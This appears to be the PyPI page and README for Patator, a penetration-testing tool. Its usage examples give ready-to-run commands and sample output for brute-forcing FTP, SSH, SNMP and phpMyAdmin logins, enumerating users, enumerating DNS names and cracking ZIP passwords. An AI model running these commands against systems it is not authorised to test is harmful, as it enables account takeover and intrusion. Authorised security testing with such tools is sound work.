# Patator
Patator was written out of frustration from using Hydra, Medusa, Ncrack, Metasploit modules and Nmap NSE scripts for password guessing attacks. I opted for a different approach in order to not create yet another brute-forcing tool and avoid repeating the same shortcomings. Patator is a multi-threaded tool written in Python, that strives to be more reliable and flexible than his fellow predecessors.
Currently it supports the following modules:
```
* ftp_login : Brute-force FTP
* ssh_login : Brute-force SSH
* telnet_login : Brute-force Telnet
* smtp_login : Brute-force SMTP
* smtp_vrfy : Enumerate valid users using the SMTP VRFY command
* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
* finger_lookup : Enumerate valid users using Finger
* http_fuzz : Brute-force HTTP/HTTPS
* rdp_gateway : Brute-force RDP Gateway
* ajp_fuzz : Brute-force AJP
* pop_login : Brute-force POP
* pop_passd : Brute-force poppassd (not POP3)
* imap_login : Brute-force IMAP
* ldap_login : Brute-force LDAP
* dcom_login : Brute-force DCOM
* smb_login : Brute-force SMB
* smb_lookupsid : Brute-force SMB SID-lookup
* rlogin_login : Brute-force rlogin
* vmauthd_login : Brute-force VMware Authentication Daemon
* mssql_login : Brute-force MSSQL
* oracle_login : Brute-force Oracle
* mysql_login : Brute-force MySQL
* mysql_query : Brute-force MySQL queries
* rdp_login : Brute-force RDP (NLA)
* pgsql_login : Brute-force PostgreSQL
* vnc_login : Brute-force VNC
* dns_forward : Brute-force DNS
* dns_reverse : Brute-force DNS (reverse lookup subnets)
* ike_enum : Enumerate IKE transforms
* snmp_login : Brute-force SNMPv1/2 and SNMPv3
* unzip_pass : Brute-force the password of encrypted ZIP files
* keystore_pass : Brute-force the password of Java keystore files
* sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
* umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
```
The name "Patator" comes from [this](https://www.youtube.com/watch?v=9sF9fTALhVA).
Patator is NOT script-kiddie friendly, please read the full README inside [patator.py](patator.py) before reporting.
Please donate if you like this project! :)
[](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=SB36VJH4EM5WG&lc=AU&item_name=lanjelot&item_number=patator¤cy_code=AUD&bn=PP%2dDonationsBF%3abtn_donateCC_LG%2egif%3aNonHosted)
Many thanks! [@lanjelot](https://twitter.com/lanjelot)
## Install
```
git clone https://github.com/lanjelot/patator.git
git clone https://github.com/danielmiessler/SecLists.git
docker build -t patator patator/
docker run -it --rm -v $PWD/SecLists/Passwords:/mnt patator dummy_test data=FILE0 0=/mnt/richelieu-french-top5000.txt
```
## Usage Examples
* FTP : Enumerating users denied login in `vsftpd/userlist`
```
$ ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500
19:36:06 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 19:36 AEDT
19:36:06 patator INFO -
19:36:06 patator INFO - code size time | candidate | num | mesg
19:36:06 patator INFO - -----------------------------------------------------------------------------
19:36:07 patator INFO - 230 17 0.002 | anonymous | 7 | Login successful.
19:36:07 patator INFO - 230 17 0.001 | ftp | 10 | Login successful.
19:36:08 patator INFO - 530 18 1.000 | root | 1 | Permission denied.
19:36:17 patator INFO - 530 18 1.000 | michael | 50 | Permission denied.
19:36:36 patator INFO - 530 18 1.000 | robert | 93 | Permission denied.
...
```
Tested against `vsftpd-3.0.2-9` on `CentOS 7.0-1406`.
* SSH : Time-based user enumeration
```
$ ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=$(perl -e "print 'A'x50000") --max-retries 0 --timeout 10 -x ignore:time=0-3
17:45:20 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 17:45 AEDT
17:45:20 patator INFO -
17:45:20 patator INFO - code size time | candidate | num | mesg
17:45:20 patator INFO - -----------------------------------------------------------------------------
17:45:30 patator FAIL - xxx 41 10.001 | root | 1 | <class '__main__.TimeoutError'> timed out
17:45:34 patator FAIL - xxx 41 10.000 | john | 23 | <class '__main__.TimeoutError'> timed out
17:45:37 patator FAIL - xxx 41 10.000 | joe | 40 | <class '__main__.TimeoutError'> timed out
...
```
Tested against `openssh-server 1:6.0p1-4+deb7u2` on `Debian 7.8`.
* HTTP : Brute-force phpMyAdmin logon
```
$ http_fuzz url=http://10.0.0.1/pma/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&target=index.php&lang=en&token=' 0=combos.txt before_urls=http://10.0.0.1/pma/index.php accept_cookie=1 follow=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf
11:53:47 patator INFO - Starting Patator v0.7-beta (http://code.google.com/p/patator/) at 2014-08-31 11:53 EST
11:53:47 patator INFO -
11:53:47 patator INFO - code size:clen time | candidate | num | mesg
11:53:47 patator INFO - -----------------------------------------------------------------------------
11:53:48 patator INFO - 200 49585:0 0.150 | root:p@ssw0rd | 26 | HTTP/1.1 200 OK
11:53:51 patator INFO - 200 13215:0 0.351 | root: | 72 | HTTP/1.1 200 OK
^C
11:53:54 patator INFO - Hits/Done/Skip/Fail/Size: 2/198/0/0/3000, Avg: 29 r/s, Time: 0h 0m 6s
11:53:54 patator INFO - To resume execution, pass --resume 15,15,15,16,15,36,15,16,15,40
```
Payload #72 was a false positive due to an unexpected error message:
```
$ grep AllowNoPassword /tmp/qsdf/72_200\:13215\:0\:0.351.txt
... class="icon ic_s_error" /> Login without a password is forbidden by configuration (see AllowNoPassword)</div><noscript>
```
Tested against `phpMyAdmin 4.2.7.1`.
* IKEv1 : Enumerate transforms supported by VPN peer
```
# ike_enum host=10.0.0.1 transform=MOD0 0=TRANS aggressive=RANGE1 1=int:0-1 -x ignore:fgrep='NO-PROPOSAL'
16:52:58 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-04-05 16:52 AEST
16:52:58 patator INFO -
16:52:58 patator INFO - code size time | candidate | num | mesg
16:52:58 patator INFO - -----------------------------------------------------------------------------
16:53:03 patator INFO - 0 70 0.034 | 5,1,1,2:0 | 1539 | Handshake returned: Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK (Main)
16:53:03 patator INFO - 0 72 0.031 | 5,1,65001,2:0 | 1579 | Handshake returned: Enc=3DES Hash=MD5 Group=2:modp1024 Auth=XAUTH&PSK (Main)
16:53:03 patator INFO - 0 76 0.033 | 5,1,1,2:1 | 1540 | Handshake returned: Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK (Aggressive)
16:53:03 patator INFO - 0 78 0.034 | 5,1,65001,2:1 | 1580 | Handshake returned: Enc=3DES Hash=MD5 Group=2:modp1024 Auth=XAUTH&PSK (Aggressive)
16:53:06 patator INFO - 0 84 0.034 | 7/128,2,1,2:0 | 2371 | Handshake returned: Enc=AES KeyLength=128 Hash=SHA1 Group=2:modp1024 Auth=PSK (Main)
16:53:06 patator INFO - 0 90 0.033 | 7/128,2,1,2:1 | 2372 | Handshake returned: Enc=AES KeyLength=128 Hash=SHA1 Group=2:modp1024 Auth=PSK (Aggressive)
16:53:06 patator INFO - 0 86 0.034 | 7/128,2,65001,2:0 | 2411 | Handshake returned: Enc=AES KeyLength=128 Hash=SHA1 Group=2:modp1024 Auth=XAUTH&PSK (Main)
16:53:06 patator INFO - 0 92 0.035 | 7/128,2,65001,2:1 | 2412 | Handshake returned: Enc=AES KeyLength=128 Hash=SHA1 Group=2:modp1024 Auth=XAUTH&PSK (Aggressive)
+ 10.0.0.1:500 (Main Mode)
Encryption Hash Auth Group
---------- ---------- ---------- ----------
3DES MD5 PSK modp1024
3DES MD5 XAUTH&PSK modp1024
AES128 SHA1 PSK modp1024
AES128 SHA1 XAUTH&PSK modp1024
+ 10.0.0.1:500 (Aggressive Mode)
Encryption Hash Auth Group
---------- ---------- ---------- ----------
3DES MD5 PSK modp1024
3DES MD5 XAUTH&PSK modp1024
AES128 SHA1 PSK modp1024
AES128 SHA1 XAUTH&PSK modp1024
16:53:11 patator INFO - Hits/Done/Skip/Fail/Size: 8/3840/0/0/3840, Avg: 284 r/s, Time: 0h 0m 13s
```
* SNMPv3 : Find valid usernames
```
$ snmp_login host=10.0.0.1 version=3 user=FILE0 0=logins.txt -x ignore:mesg=unknownUserName
17:51:06 patator INFO - Starting Patator v0.5
17:51:06 patator INFO -
17:51:06 patator INFO - code size | candidate | num | mesg
17:51:06 patator INFO - ----------------------------------------------------------------------
17:51:11 patator INFO - 0-0 11 | robert | 55 | wrongDigest
17:51:12 patator INFO - Progress: 20% (70/345) | Speed: 10 r/s | ETC: 17:51:38 (00:00:26 remaining)
17:51:33 patator INFO - 0-0 11 | myuser | 311 | wrongDigest
17:51:36 patator INFO - Hits/Done/Skip/Fail/Size: 2/345/0/0/345, Avg: 11 r/s, Time: 0h 0m 30s
```
* SNMPv3 : Find valid passwords
```
$ snmp_login host=10.0.0.1 version=3 user=robert auth_key=FILE0 0=passwords_8+.txt -x ignore:mesg=wrongDigest
17:52:15 patator INFO - Starting Patator v0.5
17:52:15 patator INFO -
17:52:15 patator INFO - code size | candidate | num | mesg
17:52:15 patator INFO - ----------------------------------------------------------------------
17:52:16 patator INFO - 0-0 69 | password123 | 16 | Linux thug 2.6.36-gentoo #5 SMP Fri Aug 12 14:49:51 CEST 2011 i686
17:52:17 patator INFO - Hits/Done/Skip/Fail/Size: 1/50/0/0/50, Avg: 38 r/s, Time: 0h 0m 1s
```
* DNS : Forward lookup
```
$ dns_forward name=FILE0.hsc.fr 0=names.txt -x ignore:code=3
03:18:46 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 03:18 PMT
03:18:46 patator INFO -
03:18:46 patator INFO - code size | candidate | num | mesg
03:18:46 patator INFO - ----------------------------------------------------------------------
03:18:46 patator INFO - 0 41 | www | 4 | NOERROR [www.hsc.fr. IN A 217.174.211.25]
03:18:46 patator INFO - 0 81 | mail | 32 | NOERROR [mail.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33]
03:18:46 patator INFO - 0 44 | webmail | 62 | NOERROR [webmail.hsc.fr. IN A 192.70.106.95]
03:18:46 patator INFO - 0 93 | test | 54 | NOERROR [hsc.fr. IN SOA itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600]
03:18:46 patator INFO - 0 40 | wap | 66 | NOERROR [wap.hsc.fr. IN A 192.70.106.33]
03:18:46 patator INFO - 0 85 | extranet | 131 | NOERROR [extranet.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33]
03:18:46 patator INFO - 0 81 | news | 114 | NOERROR [news.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33]
03:18:46 patator INFO - 0 93 | mailhost | 137 | NOERROR [mailhost.hsc.fr. IN A 192.70.106.33][mailhost.hsc.fr. IN AAAA 2001:7a8:1155:2::abcd]
03:18:46 patator INFO - 0 47 | lists | 338 | NOERROR [lists.hsc.fr. IN MX 10 itesec.hsc.fr.]
03:18:46 patator INFO - 0 93 | fr | 319 | NOERROR [hsc.fr. IN SOA itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600]
03:18:47 patator INFO - 0 40 | gl | 586 | NOERROR [gl.hsc.fr. IN A 192.70.106.103]
Records ------------------------------------------
extranet.hsc.fr. IN CNAME itesec.hsc.fr.
gl.hsc.fr. IN A 192.70.106.103
hsc.fr. IN SOA itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600
itesec.hsc.fr. IN A 192.70.106.33
lists.hsc.fr. IN MX 10 itesec.hsc.fr.
mail.hsc.fr. IN CNAME itesec.hsc.fr.
mailhost.hsc.fr. IN A 192.70.106.33
mailhost.hsc.fr. IN AAAA 2001:7a8:1155:2::abcd
news.hsc.fr. IN CNAME itesec.hsc.fr.
wap.hsc.fr. IN A 192.70.106.33
webmail.hsc.fr. IN A 192.70.106.95
www.hsc.fr. IN A 217.174.211.25
Hostmap ------------------------------------------
mailhost.hsc.fr 2001:7a8:1155:2::abcd
mailhost.hsc.fr 192.70.106.33
wap.hsc.fr 192.70.106.33
itesec.hsc.fr 192.70.106.33
extranet.hsc.fr
mail.hsc.fr
news.hsc.fr
webmail.hsc.fr 192.70.106.95
gl.hsc.fr 192.70.106.103
www.hsc.fr 217.174.211.25
Domains ------------------------------------------
hsc.fr 10
Networks -----------------------------------------
2001:7a8:1155:2::abcd
192.70.106.x
217.174.211.25
03:18:53 patator INFO - Hits/Done/Skip/Fail/Size: 11/1000/0/0/1000, Avg: 133 r/s, Time: 0h 0m 7s
```
Also notice that `test.hsc.fr.` is the start of a new zone because we got NOERROR and no IP address.
* DNS : Reverse lookup two netblocks owned by Google
```
$ dns_reverse host=NET0 0=216.239.32.0-216.239.47.255,8.8.8.0/24 -x ignore:code=3 -x ignore:fgrep!=google.com -x ignore:fgrep=216-239-
03:24:22 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 03:24 PMT
03:24:22 patator INFO -
03:24:22 patator INFO - code size | candidate | num | mesg
03:24:22 patator INFO - ----------------------------------------------------------------------
03:24:22 patator INFO - 0 46 | 216.239.32.10 | 11 | NOERROR [216.239.32.10 IN PTR ns1.google.com.]
03:24:22 patator INFO - 0 45 | 216.239.32.11 | 12 | NOERROR [216.239.32.11 IN PTR ns.google.com.]
03:24:22 patator INFO - 0 48 | 216.239.32.15 | 16 | NOERROR [216.239.32.15 IN PTR time1.google.com.]
03:24:23 patator INFO - 0 47 | 216.239.33.5 | 262 | NOERROR [216.239.33.5 IN PTR proxy.google.com.]
03:24:23 patator INFO - 0 47 | 216.239.33.12 | 269 | NOERROR [216.239.33.12 IN PTR dns1.google.com.]
03:24:23 patator INFO - 0 51 | 216.239.33.22 | 279 | NOERROR [216.239.33.22 IN PTR transfer.google.com.]
03:24:23 patator INFO - 0 50 | 216.239.33.20 | 277 | NOERROR [216.239.33.20 IN PTR esc-out.google.com.]
03:24:23 patator INFO - 0 46 | 216.239.34.10 | 523 | NOERROR [216.239.34.10 IN PTR ns2.google.com.]
03:24:23 patator INFO - 0 48 | 216.239.34.15 | 528 | NOERROR [216.239.34.15 IN PTR time2.google.com.]
^C
Records ------------------------------------------
216.239.32.10 IN PTR ns1.google.com.
216.239.32.11 IN PTR ns.google.com.
216.239.32.15 IN PTR time1.google.com.
216.239.33.12 IN PTR dns1.google.com.
216.239.33.20 IN PTR esc-out.google.com.
216.239.33.22 IN PTR transfer.google.com.
216.239.33.5 IN PTR proxy.google.com.
216.239.34.10 IN PTR ns2.google.com.
216.239.34.15 IN PTR time2.google.com.
Hostmap ------------------------------------------
ns1.google.com 216.239.32.10
ns.google.com 216.239.32.11
time1.google.com 216.239.32.15
proxy.google.com 216.239.33.5
dns1.google.com 216.239.33.12
esc-out.google.com 216.239.33.20
transfer.google.com 216.239.33.22
ns2.google.com 216.239.34.10
time2.google.com 216.239.34.15
Domains ------------------------------------------
google.com 9
Networks -----------------------------------------
216.239.32.x
216.239.33.x
216.239.34.x
03:24:29 patator INFO - Hits/Done/Skip/Fail/Size: 9/872/0/0/4352, Avg: 115 r/s, Time: 0h 0m 7s
03:24:29 patator INFO - To resume execution, pass --resume 91,75,93,73,84,95,94,95,83,89
```
* ZIP : Crack a password-protected ZIP file (older pkzip encryption used not to be supported in JtR)
```
$ unzip_pass zipfile=challenge1.zip password=FILE0 0=rockyou.dic -x ignore:code!=0
10:54:29 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 10:54:29 PMT
10:54:29 patator INFO -
10:54:29 patator INFO - code size | candidate | num | mesg
10:54:29 patator INFO - ----------------------------------------------------------------------
10:54:30 patator INFO - 0 82 | love | 387 | 0 [82] No errors detected in compressed data of challenge1.zip.
^C
10:54:31 patator INFO - Hits/Done/Skip/Fail/Size: 1/1589/0/0/5000, Avg: 699 r/s, Time: 0h 0m 2s
10:54:31 patator INFO - To resume execution, pass --resume 166,164,165,166,155,158,148,158,155,154
```
## PyInstaller
### Bundling on Windows 5.2.3790 x86
Install `python-2.7.9.msi` from [Python](https://www.python.org/downloads/windows/).
Install `pywin32-219.win32-py2.7.exe` from [PyWin32](http://sourceforge.net/projects/pywin32/files/pywin32/).
Install `vcredist_x86.exe` from [Microsoft](http://www.microsoft.com/en-us/download/confirmation.aspx?id=29).
Install `Git-1.9.5.exe` from [Git](http://git-scm.com/download/win) (and select "Use Git from Windows Command Prompt" during install).
Add `c:\Python27;c:\Python27\Scripts` to your `PATH`.
```
pip install pycrypto pyopenssl
pip install impacket
pip install paramiko
pip install IPy
pip install dnspython
pip install pysnmp
cd c:\
git clone https://github.com/lanjelot/patator
git clone https://github.com/pyinstaller/pyinstaller
cd pyinstaller
git checkout a2b0617251ebe70412f6e3573f00a49ce08b7b32 # fixes this issue: https://groups.google.com/forum/#!topic/pyinstaller/6xD75_w4F-c
python pyinstaller.py --clean --onefile c:\patator\patator.py
patator\dist\patator.exe -h
```
The resulting stand-alone `patator.exe` executable was confirmed to run successfully on Windows 2003 (5.2.3790), Windows 7 (6.1.7600), Windows 2008 R2 SP1 (6.1.7601) and Windows 2012 R2 (6.3.9600), and is likely to work fine on other Windows versions.
Refer to [#50](https://github.com/lanjelot/patator/issues/50) for more info.
Raw data
{
"_id": null,
"home_page": null,
"name": "patator",
"maintainer": null,
"docs_url": null,
"requires_python": ">=3.13",
"maintainer_email": null,
"keywords": "brute force, password attack, pentest",
"author": "Sebastien Macke",
"author_email": null,
"download_url": "https://files.pythonhosted.org/packages/37/e4/85e6c8750c5f1928050e5aa029b37986a63e1f0ba13bbede46b7848055ea/patator-1.1.0.tar.gz",
"platform": null,
"description": "# Patator\n\nPatator was written out of frustration from using Hydra, Medusa, Ncrack, Metasploit modules and Nmap NSE scripts for password guessing attacks. I opted for a different approach in order to not create yet another brute-forcing tool and avoid repeating the same shortcomings. Patator is a multi-threaded tool written in Python, that strives to be more reliable and flexible than his fellow predecessors.\n\nCurrently it supports the following modules:\n\n```\n* ftp_login : Brute-force FTP\n* ssh_login : Brute-force SSH\n* telnet_login : Brute-force Telnet\n* smtp_login : Brute-force SMTP\n* smtp_vrfy : Enumerate valid users using the SMTP VRFY command\n* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command\n* finger_lookup : Enumerate valid users using Finger\n* http_fuzz : Brute-force HTTP/HTTPS\n* rdp_gateway : Brute-force RDP Gateway\n* ajp_fuzz : Brute-force AJP\n* pop_login : Brute-force POP\n* pop_passd : Brute-force poppassd (not POP3)\n* imap_login : Brute-force IMAP\n* ldap_login : Brute-force LDAP\n* dcom_login : Brute-force DCOM\n* smb_login : Brute-force SMB\n* smb_lookupsid : Brute-force SMB SID-lookup\n* rlogin_login : Brute-force rlogin\n* vmauthd_login : Brute-force VMware Authentication Daemon\n* mssql_login : Brute-force MSSQL\n* oracle_login : Brute-force Oracle\n* mysql_login : Brute-force MySQL\n* mysql_query : Brute-force MySQL queries\n* rdp_login : Brute-force RDP (NLA)\n* pgsql_login : Brute-force PostgreSQL\n* vnc_login : Brute-force VNC\n* dns_forward : Brute-force DNS\n* dns_reverse : Brute-force DNS (reverse lookup subnets)\n* ike_enum : Enumerate IKE transforms\n* snmp_login : Brute-force SNMPv1/2 and SNMPv3\n* unzip_pass : Brute-force the password of encrypted ZIP files\n* keystore_pass : Brute-force the password of Java keystore files\n* sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases\n* umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes\n```\n\nThe name \"Patator\" comes from [this](https://www.youtube.com/watch?v=9sF9fTALhVA).\n\nPatator is NOT script-kiddie friendly, please read the full README inside [patator.py](patator.py) before reporting.\n\nPlease donate if you like this project! :)\n\n[](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=SB36VJH4EM5WG&lc=AU&item_name=lanjelot&item_number=patator¤cy_code=AUD&bn=PP%2dDonationsBF%3abtn_donateCC_LG%2egif%3aNonHosted)\n\nMany thanks! [@lanjelot](https://twitter.com/lanjelot)\n\n## Install\n\n```\ngit clone https://github.com/lanjelot/patator.git\ngit clone https://github.com/danielmiessler/SecLists.git\ndocker build -t patator patator/\ndocker run -it --rm -v $PWD/SecLists/Passwords:/mnt patator dummy_test data=FILE0 0=/mnt/richelieu-french-top5000.txt\n```\n\n## Usage Examples\n\n* FTP : Enumerating users denied login in `vsftpd/userlist`\n\n```\n$ ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500\n19:36:06 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 19:36 AEDT\n19:36:06 patator INFO -\n19:36:06 patator INFO - code size time | candidate | num | mesg\n19:36:06 patator INFO - -----------------------------------------------------------------------------\n19:36:07 patator INFO - 230 17 0.002 | anonymous | 7 | Login successful.\n19:36:07 patator INFO - 230 17 0.001 | ftp | 10 | Login successful.\n19:36:08 patator INFO - 530 18 1.000 | root | 1 | Permission denied.\n19:36:17 patator INFO - 530 18 1.000 | michael | 50 | Permission denied.\n19:36:36 patator INFO - 530 18 1.000 | robert | 93 | Permission denied.\n...\n```\n\nTested against `vsftpd-3.0.2-9` on `CentOS 7.0-1406`.\n\n* SSH : Time-based user enumeration\n\n```\n$ ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=$(perl -e \"print 'A'x50000\") --max-retries 0 --timeout 10 -x ignore:time=0-3\n17:45:20 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 17:45 AEDT\n17:45:20 patator INFO -\n17:45:20 patator INFO - code size time | candidate | num | mesg\n17:45:20 patator INFO - -----------------------------------------------------------------------------\n17:45:30 patator FAIL - xxx 41 10.001 | root | 1 | <class '__main__.TimeoutError'> timed out\n17:45:34 patator FAIL - xxx 41 10.000 | john | 23 | <class '__main__.TimeoutError'> timed out\n17:45:37 patator FAIL - xxx 41 10.000 | joe | 40 | <class '__main__.TimeoutError'> timed out\n...\n```\n\nTested against `openssh-server 1:6.0p1-4+deb7u2` on `Debian 7.8`.\n\n* HTTP : Brute-force phpMyAdmin logon\n\n```\n$ http_fuzz url=http://10.0.0.1/pma/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&target=index.php&lang=en&token=' 0=combos.txt before_urls=http://10.0.0.1/pma/index.php accept_cookie=1 follow=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf\n11:53:47 patator INFO - Starting Patator v0.7-beta (http://code.google.com/p/patator/) at 2014-08-31 11:53 EST\n11:53:47 patator INFO -\n11:53:47 patator INFO - code size:clen time | candidate | num | mesg\n11:53:47 patator INFO - -----------------------------------------------------------------------------\n11:53:48 patator INFO - 200 49585:0 0.150 | root:p@ssw0rd | 26 | HTTP/1.1 200 OK\n11:53:51 patator INFO - 200 13215:0 0.351 | root: | 72 | HTTP/1.1 200 OK\n^C\n11:53:54 patator INFO - Hits/Done/Skip/Fail/Size: 2/198/0/0/3000, Avg: 29 r/s, Time: 0h 0m 6s\n11:53:54 patator INFO - To resume execution, pass --resume 15,15,15,16,15,36,15,16,15,40\n```\n\nPayload #72 was a false positive due to an unexpected error message:\n\n```\n$ grep AllowNoPassword /tmp/qsdf/72_200\\:13215\\:0\\:0.351.txt\n... class=\"icon ic_s_error\" /> Login without a password is forbidden by configuration (see AllowNoPassword)</div><noscript>\n```\n\nTested against `phpMyAdmin 4.2.7.1`.\n\n* IKEv1 : Enumerate transforms supported by VPN peer\n\n```\n# ike_enum host=10.0.0.1 transform=MOD0 0=TRANS aggressive=RANGE1 1=int:0-1 -x ignore:fgrep='NO-PROPOSAL'\n16:52:58 patator INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-04-05 16:52 AEST\n16:52:58 patator INFO -\n16:52:58 patator INFO - code size time | candidate | num | mesg\n16:52:58 patator INFO - -----------------------------------------------------------------------------\n16:53:03 patator INFO - 0 70 0.034 | 5,1,1,2:0 | 1539 | Handshake returned: Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK (Main)\n16:53:03 patator INFO - 0 72 0.031 | 5,1,65001,2:0 | 1579 | Handshake returned: Enc=3DES Hash=MD5 Group=2:modp1024 Auth=XAUTH&PSK (Main)\n16:53:03 patator INFO - 0 76 0.033 | 5,1,1,2:1 | 1540 | Handshake returned: Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK (Aggressive)\n16:53:03 patator INFO - 0 78 0.034 | 5,1,65001,2:1 | 1580 | Handshake returned: Enc=3DES Hash=MD5 Group=2:modp1024 Auth=XAUTH&PSK (Aggressive)\n16:53:06 patator INFO - 0 84 0.034 | 7/128,2,1,2:0 | 2371 | Handshake returned: Enc=AES KeyLength=128 Hash=SHA1 Group=2:modp1024 Auth=PSK (Main)\n16:53:06 patator INFO - 0 90 0.033 | 7/128,2,1,2:1 | 2372 | Handshake returned: Enc=AES KeyLength=128 Hash=SHA1 Group=2:modp1024 Auth=PSK (Aggressive)\n16:53:06 patator INFO - 0 86 0.034 | 7/128,2,65001,2:0 | 2411 | Handshake returned: Enc=AES KeyLength=128 Hash=SHA1 Group=2:modp1024 Auth=XAUTH&PSK (Main)\n16:53:06 patator INFO - 0 92 0.035 | 7/128,2,65001,2:1 | 2412 | Handshake returned: Enc=AES KeyLength=128 Hash=SHA1 Group=2:modp1024 Auth=XAUTH&PSK (Aggressive)\n\n+ 10.0.0.1:500 (Main Mode)\n Encryption Hash Auth Group\n ---------- ---------- ---------- ----------\n 3DES MD5 PSK modp1024\n 3DES MD5 XAUTH&PSK modp1024\n AES128 SHA1 PSK modp1024\n AES128 SHA1 XAUTH&PSK modp1024\n\n+ 10.0.0.1:500 (Aggressive Mode)\n Encryption Hash Auth Group\n ---------- ---------- ---------- ----------\n 3DES MD5 PSK modp1024\n 3DES MD5 XAUTH&PSK modp1024\n AES128 SHA1 PSK modp1024\n AES128 SHA1 XAUTH&PSK modp1024\n16:53:11 patator INFO - Hits/Done/Skip/Fail/Size: 8/3840/0/0/3840, Avg: 284 r/s, Time: 0h 0m 13s\n```\n\n* SNMPv3 : Find valid usernames\n\n```\n$ snmp_login host=10.0.0.1 version=3 user=FILE0 0=logins.txt -x ignore:mesg=unknownUserName\n17:51:06 patator INFO - Starting Patator v0.5\n17:51:06 patator INFO -\n17:51:06 patator INFO - code size | candidate | num | mesg\n17:51:06 patator INFO - ----------------------------------------------------------------------\n17:51:11 patator INFO - 0-0 11 | robert | 55 | wrongDigest\n17:51:12 patator INFO - Progress: 20% (70/345) | Speed: 10 r/s | ETC: 17:51:38 (00:00:26 remaining)\n17:51:33 patator INFO - 0-0 11 | myuser | 311 | wrongDigest\n17:51:36 patator INFO - Hits/Done/Skip/Fail/Size: 2/345/0/0/345, Avg: 11 r/s, Time: 0h 0m 30s\n```\n\n* SNMPv3 : Find valid passwords\n\n```\n$ snmp_login host=10.0.0.1 version=3 user=robert auth_key=FILE0 0=passwords_8+.txt -x ignore:mesg=wrongDigest\n17:52:15 patator INFO - Starting Patator v0.5\n17:52:15 patator INFO -\n17:52:15 patator INFO - code size | candidate | num | mesg\n17:52:15 patator INFO - ----------------------------------------------------------------------\n17:52:16 patator INFO - 0-0 69 | password123 | 16 | Linux thug 2.6.36-gentoo #5 SMP Fri Aug 12 14:49:51 CEST 2011 i686\n17:52:17 patator INFO - Hits/Done/Skip/Fail/Size: 1/50/0/0/50, Avg: 38 r/s, Time: 0h 0m 1s\n```\n\n* DNS : Forward lookup\n\n```\n$ dns_forward name=FILE0.hsc.fr 0=names.txt -x ignore:code=3\n03:18:46 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 03:18 PMT\n03:18:46 patator INFO -\n03:18:46 patator INFO - code size | candidate | num | mesg\n03:18:46 patator INFO - ----------------------------------------------------------------------\n03:18:46 patator INFO - 0 41 | www | 4 | NOERROR [www.hsc.fr. IN A 217.174.211.25]\n03:18:46 patator INFO - 0 81 | mail | 32 | NOERROR [mail.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33]\n03:18:46 patator INFO - 0 44 | webmail | 62 | NOERROR [webmail.hsc.fr. IN A 192.70.106.95]\n03:18:46 patator INFO - 0 93 | test | 54 | NOERROR [hsc.fr. IN SOA itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600]\n03:18:46 patator INFO - 0 40 | wap | 66 | NOERROR [wap.hsc.fr. IN A 192.70.106.33]\n03:18:46 patator INFO - 0 85 | extranet | 131 | NOERROR [extranet.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33]\n03:18:46 patator INFO - 0 81 | news | 114 | NOERROR [news.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33]\n03:18:46 patator INFO - 0 93 | mailhost | 137 | NOERROR [mailhost.hsc.fr. IN A 192.70.106.33][mailhost.hsc.fr. IN AAAA 2001:7a8:1155:2::abcd]\n03:18:46 patator INFO - 0 47 | lists | 338 | NOERROR [lists.hsc.fr. IN MX 10 itesec.hsc.fr.]\n03:18:46 patator INFO - 0 93 | fr | 319 | NOERROR [hsc.fr. IN SOA itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600]\n03:18:47 patator INFO - 0 40 | gl | 586 | NOERROR [gl.hsc.fr. IN A 192.70.106.103]\nRecords ------------------------------------------\n extranet.hsc.fr. IN CNAME itesec.hsc.fr.\n gl.hsc.fr. IN A 192.70.106.103\n hsc.fr. IN SOA itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600\n itesec.hsc.fr. IN A 192.70.106.33\n lists.hsc.fr. IN MX 